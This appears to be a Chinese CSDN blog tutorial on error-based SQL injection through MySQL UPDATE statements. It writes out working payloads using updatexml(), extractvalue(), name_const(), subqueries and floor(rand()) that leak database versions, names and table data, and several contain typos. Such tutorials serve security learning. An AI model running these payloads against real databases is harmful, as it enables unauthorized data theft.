SQL注入Update注入

已于 2022-03-03 10:25:54 修改
阅读量5.1k 收藏 8
点赞数 2
分类专栏: 网络安全学习 文章标签: 网络安全 安全 sql
于 2022-03-03 09:26:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43765321/article/details/123242588
版权

1. MySQL中的update函数

如果我们需要修改或更新MysQL中的数据,我们可以使用SQLUPDATE命令来操作。首先更新某一行中的一个列。
UPDATE table SET column=mew_value WHERE column= value
为lastname 是"Wilson”的人添加firstname :
UPDATE Person SET FirstName = 'Fred WHERE LastName = ‘Wilson’
在这里插入图片描述
更新某一行中的若干列
UPDATE table SET column1=mew_value1, column2=mew_value2 WHEREcolumn= value
我们会修改地址( address ) ,并添加城市名称( city ) :
UPDATE Person SET Address = ‘Zhongshan 23’, City = 'Nanjing’WHERELastName = ‘Wilson’
在这里插入图片描述

2. SQL注入Update的利用

2.1 注入语法

因为我们这里是用的显错模式,所以思路就是在insert、update、delete语句中人为构造语法错误,利用如下语句∶
insert into users (id,username, password) values (2, “inject here” ; ‘Olivia’);
insert into users (id, username, password) values (2,"“inject here”", ‘Olivia’);
在这里插入图片描述

2.2 利用updatexml()获取数据

updatexml()函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。
获取数据库版本信息
UPDATE users SET password=‘Nicky’ or updatexml(2,concat(Ox7e,(version())),0)or"“WHERE id=2 and username='Olivia”;
在这里插入图片描述
利用Update获取user表的数据
在这里插入图片描述

2.3 利用extractvalue()获取数据

extractvalue()函数也是MYSQL对XML文档数据进行查询和修改的XPATH函数。
获取数据库名
UPDATE users SET password=‘Nicky’ or extractvalue(1,concat(Ox7e,database()))or"" WHERE id=2 and username= 'Nervo;
在这里插入图片描述
可以用insert、update、delete语句获取到数据库表名、列名,但是不能用update获取当前表的数据。

2.4 利用name_const()获取数据

name_const()函数是MYSQL5.0.12版本加入的一个返回给定值的函数。当用来产生一个结果集合列时,NAME_CONST()促使该列使用给定名称。
获取数据库版本信息
UPDATE users SET password=‘Nicky’ or (SELECT * FROM
(SELECT(name_const(version(),1)),name_const(version(),1))a) or " WHERE id=2and username= ‘Nervo’;
在这里插入图片描述

2.5 利用子查询注入

原理与select查询时的显错注入一致。
查询数据库名
UPDATE users SET password=‘Nicky’ or (SELECT 1 FROM(SELECT
count(*),concat((SELECT(SELECT concat(Ox7e,0x27,cast(database() as
char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))×FROM information_schema.columns group by x)a)or" WHERE id=2 and
username=‘Nervo’;
在这里插入图片描述

2.6 利用floor()函数注入

原理是利用了主键的唯一性,通过floor(rand(0)2)

随机产生0和1以及group by重复获取floor(rand(0)2),制造主键重复,从而报错

获取数据库版本信息
UPDATE users SET password=‘Nicky’ or (select 1 from (select
count(*),concat(version(),0x23,floor(rand(0)*2))x from information_schema.tablesgroup by x)a) or " WHERE id=2 and username =‘Nervo’;
在这里插入图片描述
文章参考哔哩哔哩奇安信网络安全培训视频

now ~ try
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
极光-SQL注入V1.5.7 Win64 update by 2016-8-19
08-20
极光-SQL注入V1.5.7 Win64 update by 2016-8-19
[Pikachu靶场实战系列] SQL注入(insert/update注入
00勇士王子的博客
07-28 3197
insert注入 发现有个注册页面,注册页面如果有注入漏洞的话,一般是insert类型的,因为注册相当于往数据库的表中插入一行新数据 填写注册信息,然后抓个包,可以看到时post形式传输的数据 尝试在admiin后加单引号,报错了而且报错信息中没有出现admiin,可能是单引号完成闭合了,最后还需要加个)完成闭合 添加其他参数和)构建闭合 username=admiin’,‘111’,‘222’,‘333’,‘444’,‘555’)# 构建好闭合了,但是这个注册页面是没有回显的,怎样查询数据呢,
(手工)【sqli-labs17】update注入:原理、利用过程
07-10 615
SQL-update注入
sqllabs第五关updatexml报错注入
m0_73948163的博客
03-01 519
下面的都可以按照上面的大家要学会语法。还有下面还有个拓展函数也是报错函数。
SQL注入之insert/update/delete注入
情感博主V
02-15 3073
相关函数 UpdateXML(xml_target,xpath_expr,new_xml) #此函数将xml_target中用xpath_expr路径匹配到XML片段用new_xml替换,然后返回更改后的XML。 #xml_target被替换的部分与xpath_expr用户提供的XPath表达式匹配。 #如果找不到表达式匹配 xpath_expr项,或者找到多个匹配项,则该函数返回原始 ml_ta...
SQL注入实战:Update注入
ting_liang的博客
01-21 532
有的程序员在写源代码的时候,只是对查询的sql语句的用户输入内容进行了过滤,忽略了updateupdate表名称set列名称=新值where更新条件;1、sqli-labs less-17关。类型sql语句的用户输入的内容的过滤。二、mysqlUpdate语句复习。如下图所示,爆出数据库名称。一:Update注入原理。如下图所示,爆出版本信息。
不一样的sql注入
2202_75361164的博客
05-18 562
不一样的sql注入,看了肯定有所收获!
update语句_WEB安全SQL注入(13)——update注入
weixin_39848953的博客
12-09 2554
01前言大家好,我是阿里斯,一名IT行业小白。上一篇文章分享了insert注入,算是一个铺垫,今天我们一起来看看update注入update注入是非常危险一种注入。可能因为payload构造不合理会直接导致整张表都被修改。02update注入update正常语句update users set sex='man' where id=$id;update注入是非常危险的,不管你开发还是安...
SQL注入内容更新.
一个世界一个家,我爱中国!
04-24 873
DECLARE @T VARCHAR(255),@C VARCHAR(255) --声明两个变量DECLARE Table_Cursor CURSOR FOR  --声明游标Select a.name,b.name FROM sysobjects a,syscolumns b --系统对象表与字段表Where a.id=b.id AND a.xtype=u AND (b.xtype=99 or
SQL注入——update注入(pikachu)
W小哥
01-15 3169
第一步:访问目标站点,注册一个账号xiaosan:123456,并登录 第二步:点击修改个人信息,并用burpsuite工具拦截数据包,修改住址为123456 拦截数据包,右键发送到Repeater 第三步:测试注入点 正常请求页面 输入单引号测试注入点页面 第四步:经过测试发现不能使用联合查询注入,故改为报错注入获取当前网站所连接的数据库的名字 1’ or updatexml(1,co...
mysql 注入 update_关于update的一个小注入
weixin_32698563的博客
02-01 983
昨天在小密圈看到ph师傅发了一段code,当时想的是利用join方法去进行报错注入,结果晚上一看,乐师傅已经解决了QAQ(膜,自己也写一下关于这段code的分析:code区域:$link = mysqli_connect('localhost', 'root', 'root');mysqli_select_db($link, 'code');$table = addslashes($_GET['t...
SQL注入漏洞全接触——高级篇.txt
02-13
看完入门篇和进阶篇后,稍加练习,破解...5. 猜解Access时只能用Ascii逐字解码法,SQLServer也可以用这种方法,只需要两者之间的区别即可,但是如果能用SQLServer的报错信息把值暴露出来,那效率和准确率会有极大的提高
php防止sql注入代码实例
12-18
放到公用调用文件(如conn数据库链接文件),对所有GET或POST的数据进行过滤特殊字符串,以实现简单有效的SQL注入过滤 复制代码 代码如下:Function inject_check($sql_str) { return eregi(‘select|insert|and|or|...
.Net防sql注入的几种方法
01-01
sql注入的常用方法: 1、服务端对前端传过来的参数值进行类型验证; 2、服务端执行sql,使用参数化传值,而不要使用sql字符串拼接; 3、服务端对前端传过来的数据进行sql关键词过来与检测; 着重记录下服务端进行...
java sql注入l
10-01
-- 防止SQL注入的过滤器 --> 72 <filter> 73 <filter-name>antiSqlInjection</filter-name> 74 <filter-class>com.tarena.dingdang.filter.AntiSqlInjectionfilter</filter-class> 75 </filter> 76 ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8190
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
vue2 顶象 安全 验证码的使用
lele66688888的博客
04-23 319
类似与这样的登录之前的验证 滑动一个盒子了 或者是 顺序点击文字了 等。
RTU遥测终端为城市排水安全保驾护航!
mantoo2014的博客
04-23 471
漫途多参数遥测终端MTW46-10-4A与低功耗遥测终端M4315,能够实时在线监测城市下水管道、涵洞、水浸点及河道的水位状况,同时精准采集水位、流量、流速和水质等数据。一旦监测到险情,平台会通过手机APP、短信通知以及现场声光报警器等多种方式,向城市管理者发出预警,从而有效预防和应对各类排水问题,确保城市排水系统的安全、稳定运行。漫途低功耗远程采集终端M4315是一款实现数据采集、远程传输、远程运维的智能设备,具有功耗低、体积小巧、盲区小、安装便捷等特点,适用于地下管网、雨水井等特殊环境的工业级设备。
Mudem,打造私密安全、高效稳定的私人空间
最新发布
yescodigger的博客
04-23 349
平台中的一个关键组件,它提供基础通讯服务,确保不同类型的机器之间可以进行安全和高效的连接。用户无需担心环境配置的问题,只需在任何地点、任何时间使用自己熟悉的工作环境,即可实现高效工作,极大地提高了工作效率。用户可以根据自己的需求精确控制终端的访问权限,从而有效地防止了未经授权的访问和数据泄露。这一技术革新不仅使用户能够轻松实现远程访问和控制这些设备,同时确保了终端访问权限的精确控制,从而保障了用户数据的安全。在远程访问过程中确保了数据的机密性和完整性,让用户无需担心数据泄露的风险。精准控制终端访问权限。
sql注入pikachu
09-24
SQL注入是一种针对数据库的安全漏洞,黑客通过在输入的SQL语句中插入恶意代码,从而对数据库进行非法操作。关于SQL注入攻击的具体细节,您提供的引用中给出了一些例子和方法。 引用提到,在insert、update和delete操作中,不能使用union来进行联合查询,因为这不是查询操作。 引用展示了一个语法错误,这可能是一种报错注入的尝试。黑客试图通过在URL中插入恶意代码来获取数据库信息。 引用则是一个宽字节注入的示例,黑客利用特定的SQL语句来获取表名、列名和数据。 为了防止SQL注入攻击,我们可以采取以下几个措施: 1. 输入验证和过滤: 对所有的用户输入进行验证和过滤,确保输入的数据符合预期的格式和类型。 2. 使用参数化查询或预编译语句: 在构建SQL查询时,使用参数化查询或预编译语句,将用户输入的数据作为参数传递,而不是直接拼接到SQL语句中。 3. 最小权限原则: 为数据库用户分配最小权限,限制其对数据库的访问和操作权限。 4. 定期更新和修补: 及时更新数据库和应用程序的补丁,修复已知的安全漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值